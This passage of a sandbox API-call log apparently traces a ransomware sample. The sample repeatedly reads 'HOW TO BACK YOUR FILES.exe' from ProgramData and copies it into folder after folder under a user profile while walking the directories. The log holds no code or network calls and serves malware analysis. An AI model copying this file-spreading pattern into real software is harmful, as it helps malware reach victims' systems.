files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\microsoft\\internet explorer\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.527] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.527] GetLastError () returned 0x0 [0042.527] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.527] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.527] CloseHandle (hObject=0x118) returned 1 [0042.527] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.527] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ab6e2e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ab6e2e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.527] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.528] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.528] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache" [0042.528] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache" [0042.528] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.528] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\microsoft\\feeds cache\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.528] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.528] GetLastError () returned 0x0 [0042.528] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.528] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.528] CloseHandle (hObject=0x118) returned 1 [0042.529] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.529] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4abba5a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4abba5a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.529] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.529] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.529] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD" [0042.529] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD" [0042.529] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.529] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\microsoft\\feeds cache\\kqmhsvkd\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.529] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.530] GetLastError () returned 0x0 [0042.530] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.530] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.530] CloseHandle (hObject=0x118) returned 1 [0042.530] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.530] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4abe0700, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4abe0700, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.530] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.530] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.530] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ" [0042.530] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ" [0042.530] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.530] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\microsoft\\feeds cache\\d68g7bij\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.531] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.531] GetLastError () returned 0x0 [0042.531] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.531] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.531] CloseHandle (hObject=0x118) returned 1 [0042.531] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.531] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4abe0700, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4abe0700, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.531] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.531] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.531] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7" [0042.532] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7" [0042.532] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.532] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\microsoft\\feeds cache\\6asvn7j7\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.532] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.532] GetLastError () returned 0x0 [0042.532] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.532] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.532] CloseHandle (hObject=0x118) returned 1 [0042.532] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.532] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac2c9c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac2c9c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.533] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.533] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.533] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR" [0042.533] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR" [0042.533] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.533] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\microsoft\\feeds cache\\1nbur4hr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.533] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.533] GetLastError () returned 0x0 [0042.533] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.533] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.534] CloseHandle (hObject=0x118) returned 1 [0042.534] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.534] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac2c9c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac2c9c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.534] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.534] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.534] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds" [0042.534] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds" [0042.534] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.534] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\microsoft\\feeds\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.535] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.535] GetLastError () returned 0x0 [0042.535] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.535] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.535] CloseHandle (hObject=0x118) returned 1 [0042.535] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.535] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac52b20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac52b20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.535] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.535] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.535] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" [0042.535] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" [0042.535] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.535] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.536] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.536] GetLastError () returned 0x0 [0042.536] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.536] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.536] CloseHandle (hObject=0x118) returned 1 [0042.536] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.536] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac52b20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac52b20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.536] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.537] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.537] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" [0042.537] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" [0042.537] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.537] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.537] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.537] GetLastError () returned 0x0 [0042.537] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.537] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.537] CloseHandle (hObject=0x118) returned 1 [0042.538] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.538] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local 